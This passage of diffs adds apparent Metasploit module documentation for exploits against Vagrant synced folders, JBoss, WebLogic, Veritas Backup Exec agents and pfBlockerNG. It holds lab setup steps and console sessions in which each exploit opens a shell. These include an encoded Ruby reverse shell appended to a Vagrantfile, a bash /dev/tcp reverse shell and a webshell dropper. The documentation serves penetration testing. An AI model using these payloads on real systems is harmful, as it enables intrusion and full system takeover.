+if ! Process.fork()
+eval(code) rescue nil
+end
+end
+```
+
+### StefanScherer/windows_2019 guest virtual machine in Vagrant 2.3.1 with VirtualBox 6.1 running on Ubuntu 22.04.1
+
+```
+msf6 > sessions -i 1 -C sysinfo
+[*] Running 'sysinfo' on meterpreter session 1 (10.0.2.15)
+Computer        : VAGRANT
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+msf6 > sessions -i 1 -C getuid
+[*] Running 'getuid' on meterpreter session 1 (10.0.2.15)
+Server username: VAGRANT\test
+msf6 > use exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
+[*] Using configured payload ruby/shell_reverse_tcp
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set session 1
+session => 1
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > check
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session platform: windows
+[*] The service is running, but could not be validated. Could not verify if /vagrant/Vagrantfile is writable.
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set payload ruby/shell_reverse_tcp
+payload => ruby/shell_reverse_tcp
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set lport 4444
+lport => 4444
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session platform: windows
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Could not verify if /vagrant/Vagrantfile is writable.
+[*] Appending payload (516 bytes) to /vagrant/Vagrantfile ...
+[*] Payload appended to /vagrant/Vagrantfile
+[*] The payload will be executed when a user runs any vagrant command from within the project directory on the host system.
+[!] This module requires manual removal of the payload from the project Vagrantfile: /vagrant/Vagrantfile
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > use exploit/multi/handler
+[*] Using configured payload windows/x64/shell/reverse_tcp
+msf6 exploit(multi/handler) > set payload ruby/shell_reverse_tcp
+payload => ruby/shell_reverse_tcp
+msf6 exploit(multi/handler) > set lport 4444
+lport => 4444
+msf6 exploit(multi/handler) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(multi/handler) > run -jz
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf6 exploit(multi/handler) > [*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.204:51524) at 2022-10-16 06:34:04 -0400
+
+msf6 exploit(multi/handler) > sessions -i 2
+[*] Starting interaction with 2...
+
+id
+uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt)
+pwd
+/home/user/vagrant/windows2019
+tail -n 13 Vagrantfile
+
+code = %(cmVxdWlyZSAnc29ja2V0JztjPVRDUFNvY2tldC5uZXcoIjE5Mi4xNjguMjAwLjEzMCIsIDQ0NDQpOyRzdGRpbi5yZW9wZW4oYyk7JHN0ZG91dC5yZW9wZW4oYyk7JHN0ZGVyci5yZW9wZW4oYyk7JHN0ZGluLmVhY2hfbGluZXt8bHxsPWwuc3RyaXA7bmV4dCBpZiBsLmxlbmd0aD09MDsoSU8ucG9wZW4obCwicmIiKXt8ZmR8IGZkLmVhY2hfbGluZSB7fG98IGMucHV0cyhvLnN0cmlwKSB9fSkgcmVzY3VlIG5pbCB9).unpack(%(m0)).first
+if RUBY_PLATFORM =~ /mswin|mingw|win32/
+inp = IO.popen(%(ruby), %(wb)) rescue nil
+if inp
+inp.write(code)
+inp.close
+end
+else
+if ! Process.fork()
+eval(code) rescue nil
+end
+end
+```
@@ -0,0 +1,153 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java deserialization vulnerability in JBOSS
+EAP/AS Remoting Unified Invoker interface for versions 6.1.0 and prior.
+
+### Setup
+
+#### Dockerfile
+```dockerfile
+FROM jboss/base-jdk:8
+
+# Set the JBOSS_VERSION env variable
+ENV JBOSS_HOME /opt/jboss/jboss-as-6.1
+ENV EAP_HOME /opt/jboss/jboss-as-6.1
+
+# Add the JBoss distribution to /opt, and make jboss the owner of the extracted zip content
+# https://jbossas.jboss.org/downloads 
+RUN curl https://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip -o /opt/jboss/jboss-as-6.1.0.zip
+RUN jar -xvf /opt/jboss/jboss-as-6.1.0.zip \
+&& mv /opt/jboss/jboss-6.1.0.Final $EAP_HOME \
+&& chmod a+x $EAP_HOME/bin/*
+
+# Ensure signals are forwarded to the JVM process correctly for graceful shutdown
+#ENV LAUNCH_JBOSS_IN_BACKGROUND true
+
+# Enable binding to all network interfaces and debugging inside the EAP
+RUN echo "JAVA_OPTS=\"\$JAVA_OPTS -Djboss.bind.address=0.0.0.0 -Djboss.bind.address.management=0.0.0.0\"" >> ${EAP_HOME}/bin/run.conf
+
+# Expose the ports we're interested in
+EXPOSE 8080 9990 4447 9999 4446 3873 4445
+
+# Set the default command to run on boot
+# This will boot JBoss EAP in the standalone mode and bind to all interface
+ENTRYPOINT ["/opt/jboss/jboss-as-6.1/bin/run.sh"]
+```
+
+#### docker-compose.yml
+
+```yml
+version: "3"
+services:
+  web:
+    build: .
+    ports:
+      - "8080:8080" 
+      - "9990:9990" 
+      - "4447:4447" 
+      - "9999:9999" 
+      - "4446:4446" 
+      - "3873:3873" 
+      - "4445:4445"
+    networks:
+      internet:
+        aliases:
+          - jboss-as-61
+networks:
+    internet:
+        driver: bridge
+```
+
+```bash
+docker-compose up
+```
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Scenarios
+
+### JBoss Application Server 6.1.0 from [Docker](#setup).
+
+```
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) > options
+
+Module options (exploit/multi/misc/jboss_remoting_unified_invoker_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RHOSTS   localhost        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    4446             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL for incoming connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.15     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.15:4444
+[*] 127.0.0.1:4446 - Running automatic check ("set AutoCheck false" to disable)
+[+] 127.0.0.1:4446 - The target appears to be vulnerable.
+[*] 127.0.0.1:4446 - Executing Unix Command for cmd/unix/reverse_bash
+[+] 127.0.0.1:4446 - Successfully executed command: bash -c '0<&70-;exec 70<>/dev/tcp/192.168.1.15/4444;sh <&70 >&70 2>&70'
+[*] Command shell session 1 opened (192.168.1.15:4444 -> 192.168.1.15:65270) at 2022-07-05 00:06:09 +0200
+
+id
+uid=1000(jboss) gid=1000(jboss) groups=1000(jboss)
+pwd
+/opt/jboss
+/opt/jboss/jboss-as-6.1/bin/run.sh --version
+=========================================================================
+
+  JBoss Bootstrap Environment
+
+  JBOSS_HOME: /opt/jboss/jboss-as-6.1
+
+  JAVA: /usr/lib/jvm/java/bin/java
+
+  JAVA_OPTS: -server -Xms128m -Xmx512m -XX:MaxPermSize=256m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -Djboss.bind.address=0.0.0.0 -Djboss.bind.address.management=0.0.0.0 -Djava.net.preferIPv4Stack=true -Dprogram.name=run.sh -Dlogging.configuration=file:/opt/jboss/jboss-as-6.1/bin/logging.properties -Djava.library.path=/opt/jboss/jboss-as-6.1/bin/native/lib64:/opt/jboss/jboss-as-6.1/bin/native/lib64
+
+  CLASSPATH: /opt/jboss/jboss-as-6.1/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar
+
+=========================================================================
+
+OpenJDK 64-Bit Server VM warning: ignoring option MaxPermSize=256m; support was removed in 8.0
+JBoss 6.1.0.Final (Build SVNTag:JBoss_6.1.0.Final date: 20110816)
+
+Distributable under LGPL license.
+See terms of license at gnu.org.
+
+exit
+[*] 127.0.0.1 - Command shell session 1 closed.
+msf6 exploit(multi/misc/jboss_remoting_unified_invoker_rce) >
+```
@@ -1,8 +1,14 @@
 ## Vulnerable Application

-CVE-2017-10271 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.  The exploit provides an unauthenticated attacker with remote arbitrary command execution.
+CVE-2019-2725 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.
+The exploit provides an unauthenticated attacker with remote arbitrary command execution.

-Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.  It is downloadable from Oracle once registered for an account.  For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`), Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).  For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`) in combination with a JDK (`jdk-8u211-windows-x64.exe`).
+Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.
+It is downloadable from Oracle once registered for an account.
+For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`),
+Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).
+For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`)
+in combination with a JDK (`jdk-8u211-windows-x64.exe`).

 ## Verification Steps

@@ -13,7 +19,10 @@ Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environ
  3. When prompted, use a development environment instead of a production environment.
  4. When prompted, keep the default port of TCP/7001.
  5. When prompted, provide a username and password, and make a note of them.
-  6. Upon completion of the installer, find and execute the admin server.  On Windows: `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
+  6. Upon completion of the installer, find and execute the admin server.
+  On Windows:
+  `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.
+  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
  7. You may be prompted for the username and password you generated during the install process.
  8. Wait for the output: `<Server state changed to RUNNING.>`

@@ -39,7 +48,8 @@ msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check

 ## Options

-  **TARGETURI** : Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`. You can also set `VHOST` instead to handle virtual hosts.
+### TARGETURI
+Set this to the AsyncResponseService uri, normally it should be `/_async/asyncresponseservice`.

 ## Scenarios

@@ -0,0 +1,272 @@
+## Vulnerable Application
+
+Backup Exec consists of a server component as well as remote agents that are
+installed on each host that should be backed up by the server.
+
+There are remote agents available for a range of data sources, including
+operating-system level agents for Windows and Linux hosts' local filesystems,
+application-specific agents for Microsoft Exchange, SharePoint, Active
+Directory, etc., and agents for virtual machines such as VMware or Hyper-V
+instances. This exploit targets the Windows and Linux OS-level remote agents.
+The agents are installed as services running by default with
+`NT AUTHORITY\SYSTEM` or `root` user rights for Windows and Linux respectively.
+
+Vulnerable Backup Exec Remote Agent versions are 9.3 and below. These
+agents' versions are distributed with Backup Exec versions 21.1 and below.
+
+A trial version of Backup Exec can be downloaded from Veritas'
+[website](https://www.veritas.com/form/trialware/backup-exec).
+All supported version of Backup Exec is available in Veritas'
+[download center](https://www.veritas.com/content/support/en_US/downloads/).
+
+## Verification Steps
+
+1. Download Backup Exec distributive and install Backup Exec Remote
+   Agent on Windows or Linux host.
+2. Start `msfconsole`.
+3. Select the module and set the address of the host running the remote agent:
+```
+   use exploit/multi/veritas/beagent_sha_auth_rce
+   set RHOSTS [REMOTE_AGENT_HOST]
+```
+4. Check the service is running and potentially vulnerable with the `check`
+   command.
+5. Set TARGET (Windows or Linux) depending on operating system on the host
+   running the remote agent:
+```
+   set TARGET [OS_NAME]
+```
+6. Set and configure preferred payload:
+```
+   set PAYLOAD [PAYLOAD_NAME]
+   set LHOST [LOCAL_IP]
+   set LPORT [LOCAL_PORT]
+```
+7. If Backup Exec Remote Agent run on the Linux then set preferred interpreter
+   to execute the command (by default, `/bin/bash`). The option does not matter
+   for Windows hosts since the command will always be executed using
+   `C:\Windows\System32\cmd.exe`.
+```
+   set INTERPRETER [INTERPRETER_NAME]
+```
+8. Start the module using the `exploit` command.
+9. Enjoy the received shell.
+
+An example session is as follows:
+
+```
+msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.141
+rhosts => 172.16.180.141
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
+lhost => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 
+
+Module options (exploit/multi/veritas/beagent_sha_auth_rce):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT   10000            yes       The target port (TCP)
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 172.16.180.141:10000 - BE agent revision: 9.3
+[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.141:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.180.141:10000 - Checking vulnerability
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Getting supported authentication types
+[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 172.16.180.141:10000 - BE agent revision: 9.3
+[+] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 172.16.180.141:10000 - Exploiting ...
+[*] 172.16.180.141:10000 - Connecting to BE Agent service
+[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
+[*] 172.16.180.141:10000 - Passing SHA authentication
+[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 172.16.180.141
+[*] Meterpreter session 1 opened (172.16.180.248:4444 -> 172.16.180.141:49629) at 2022-09-23 10:33:42 +0300
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```
+
+## Options
+
+### INTERPRETER
+The command line interpreter for executing Linux OS command. By default, the option is
+`/bin/bash`. For Windows the option does not matter and the command will always be
+executed using `C:\Windows\System32\cmd.exe`.
+
+## Scenarios
+
+The Backup Exec Remote Agent is installed on each host that has local filesystems
+that should be backed up. These agents listen on the network for NDMP connections
+(10000/tcp), appearing in Nmap scans with scripts enabled as follows:
+
+```
+$ nmap -p10000 -n 172.16.180.0/24 --open -vvv
+...
+Discovered open port 10000/tcp on 172.16.180.133
+Discovered open port 10000/tcp on 172.16.180.132
+Discovered open port 10000/tcp on 172.16.180.141
+...
+$ nmap -p10000 -n -sV 172.16.180.133
+...
+10000/tcp open  ndmp    Symantec/Veritas Backup Exec ndmp (NDMPv3)
+...
+```
+
+(Note that the `ndmp-version` script fails to execute due to not sending an
+`NDMP_CONNECT_OPEN` request before querying version information with the
+`NDMP_CONFIG_GET_HOST_INFO` request. This exploit module's `check` command will
+carry this query out successfully.)
+
+### Windows; Backup Exec 21.0 (Backup Exec Remote Agent, revision 9.3)
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
+rhosts => 192.168.123.147
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.123.147:10000 - Checking vulnerability
+[*] 192.168.123.147:10000 - Connecting to BE Agent service
+[*] 192.168.123.147:10000 - Getting supported authentication types
+[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
+[*] 192.168.123.147:10000 - BE agent revision: 9.3
+[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 192.168.123.147:10000 - Exploiting ...
+[*] 192.168.123.147:10000 - Connecting to BE Agent service
+[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
+[*] 192.168.123.147:10000 - Passing SHA authentication
+[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
+[*] Sending stage (175686 bytes) to 192.168.123.147
+[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-BE1QFC9
+OS              : Windows 10 (10.0 Build 19041).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.123.147 - Meterpreter session 1 closed.  Reason: User exit
+```
+
+### Linux; Backup Exec 16.0 (Backup Exec Remote Agent, revision 9.2)
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
+rhosts => 172.16.199.133
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
+target => 1
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.133:10000 - Checking vulnerability
+[*] 172.16.199.133:10000 - Connecting to BE Agent service
+[*] 172.16.199.133:10000 - Getting supported authentication types
+[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
+[*] 172.16.199.133:10000 - BE agent revision: 9.2
+[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
+[*] 172.16.199.133:10000 - Exploiting ...
+[*] 172.16.199.133:10000 - Connecting to BE Agent service
+[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
+[*] 172.16.199.133:10000 - Passing SHA authentication
+[*] 172.16.199.133:10000 - Uploading payload with CmdStager
+[*] 172.16.199.133:10000 - Command Stager progress -  44.15% done (362/820 bytes)
+[*] Sending stage (3020772 bytes) to 172.16.199.133
+[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : debian.test.com
+OS           : Debian 9.13 (Linux 4.9.0-19-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > Interrupt: use the 'exit' command to quit
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.16.199.133 - Meterpreter session 2 closed.  Reason: User exit
+```
+
+### Windows; Backup Exec 21.2 (Backup Exec Remote Agent, revision 9.4) - NOT VULNERABLE
+```
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.135
+rhosts => 172.16.180.135
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
+lhost => 172.16.180.248
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check
+
+[*] 172.16.180.135:10000 - Checking vulnerability
+[*] 172.16.180.135:10000 - Connecting to BE Agent service
+[*] 172.16.180.135:10000 - Getting supported authentication types
+[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+[*] 172.16.180.135:10000 - BE agent revision: 9.4
+[*] 172.16.180.135:10000 - The target is not exploitable. SHA authentication is disabled
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.180.248:4444 
+[*] 172.16.180.135:10000 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.180.135:10000 - Checking vulnerability
+[*] 172.16.180.135:10000 - Connecting to BE Agent service
+[*] 172.16.180.135:10000 - Getting supported authentication types
+[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
+[*] 172.16.180.135:10000 - BE agent revision: 9.4
+[-] 172.16.180.135:10000 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. SHA authentication is disabled "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/veritas/beagent_sha_auth_rce) > 
+```
@@ -0,0 +1,189 @@
+## Vulnerable Application
+
+### Description
+This module exploits a vulnerability in the pfSense plugin, pfBlockerNG that allows remote unauthenticated
+attackers to execute execute arbitrary OS commands as root via shell meta characters in the HTTP Host header.
+Versions <= 2.1.4_26 are vulnerable. Note that version 3.x is unaffected.
+
+### Setup
+Download the pfSense image:
+
+`wget https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.5.2-RELEASE-amd64.iso.gz`
+
+To obtain a vulnerable copy of the pfBlockerNG plugin, you can build it from source from the [official pfSense github
+repo](https://github.com/pfsense/FreeBSD-ports/tree/devel/net/pfSense-pkg-pfBlockerNG), or it can be downloaded from
+the following link:
+
+`wget https://files01.netgate.com/pkg/pfSense_plus-v21_09_aarch64-pfSense_plus_v21_09/All/pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+
+Install the .iso file in your favorite virtualizing software. You may need to use the `UEFI` or `BIOS` installation
+options to install the software correctly. For testing, `BIOS` was used. You may also need to set the WAN settings.
+For this you can just use the default or set it to `hn0` which should also be the default, and this will work fine for
+testing purposes.
+
+Once installed pfSense will start and you can access the web GUI by navigating to `https://<pfSense-IP-address>/`.
+Sign into the application with username: `admin` password: `pfsense`
+
+Now at the top of the screen select System -> Advanced. Scroll down to the section named Secure Shell and tick the box
+beside `Enable Secure Shell`. Then click the `Save` button at the the bottom of the page to apply the changes.
+
+From your host machine we can now transfer the vulnerable package to the pfSense VM using `scp`
+
+`scp pfSense-pkg-pfBlockerNG-2.1.4_26.pkg root@<pfSense-IP-address>:/`
+
+(the root password of the VM will be the same as the admin password: `pfsense`)
+
+Install the vulnerable package with: `pkg install pfSense-pkg-pfBlockerNG-2.1.4_26.pkg`
+
+## Options
+
+### WEBSHELL_NAME
+
+This is the name of the webshell that will get uploaded to the pfsense target sans the ".php" ending.
+If left unset the file name will be randomly generated.
+
+## Verification Steps
+
+1. Start msfconsole
+1. `use unix/http/pfsense_pfblockerng_webshell`
+1. Set the `RHOST` and `LHOST` options
+1. `exploit`
+1. Receive a shell as the `root` user
+
+## Scenarios
+### pfSense 2.5.2-RELEASE with pfSense-pkg-pfBlockerNG-2.1.4_26.pkg installed
+```
+msf6 > use exploit/unix/http/pfsense_pfblockerng_webshell
+[*] Using configured payload bsd/x64/shell_reverse_tcp
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set RHOSTS 172.23.40.111
+RHOSTS => 172.23.40.111
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set LHOST 172.23.47.143
+LHOST => 172.23.47.143
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set LPORT 4453
+LPORT => 4453
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set SRVPORT 8383
+SRVPORT => 8383
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options
+
+Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         172.23.40.111    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          443              yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
+                                              listen on all addresses.
+   SRVPORT        8383             yes       The local port to listen on.
+   SSL            true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+   WEBSHELL_NAME                   no        The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse
+                                             t.
+
+
+Payload options (bsd/x64/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   CMD    /bin/sh          yes       The command string to execute
+   LHOST  172.23.47.143    yes       The listen address (an interface may be specified)
+   LPORT  4453             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   BSD Dropper
+
+
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse TCP handler on 172.23.47.143:4453 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading shell...
+[*] Webshell name is: zFOOjmPXX.php
+[+] The target is vulnerable.
+[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
+[*] Using URL: http://172.23.47.143:8383/ITtfiF
+[*] Client 172.23.40.111 (curl/7.76.1) requested /ITtfiF
+[*] Sending payload to 172.23.40.111 (curl/7.76.1)
+[+] Deleted /usr/local/www/zFOOjmPXX.php
+[*] Command shell session 1 opened (172.23.47.143:4453 -> 172.23.40.111:30301) at 2022-10-12 19:08:21 -0500
+
+id
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Server stopped.
+
+uid=0(root) gid=0(wheel) groups=0(wheel)
+whoami
+root
+uname -a
+FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE fd0f54f44b5c(RELENG_2_5_0) pfSense  amd64
+exit
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > set TARGET 0
+TARGET => 0
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > show options
+
+Module options (exploit/unix/http/pfsense_pfblockerng_webshell):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         172.23.40.111    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          443              yes       The target port (TCP)
+   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
+                                              listen on all addresses.
+   SRVPORT        9933             yes       The local port to listen on.
+   SSL            true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+   WEBSHELL_NAME                   no        The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unse
+                                             t.
+
+
+Payload options (cmd/unix/reverse_openssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.23.47.143    yes       The listen address (an interface may be specified)
+   LPORT  4545             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(unix/http/pfsense_pfblockerng_webshell) > run
+
+[*] Started reverse double SSL handler on 172.23.47.143:4545 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Uploading shell...
+[*] Webshell name is: jIuhcpoe.php
+[+] The target is vulnerable.
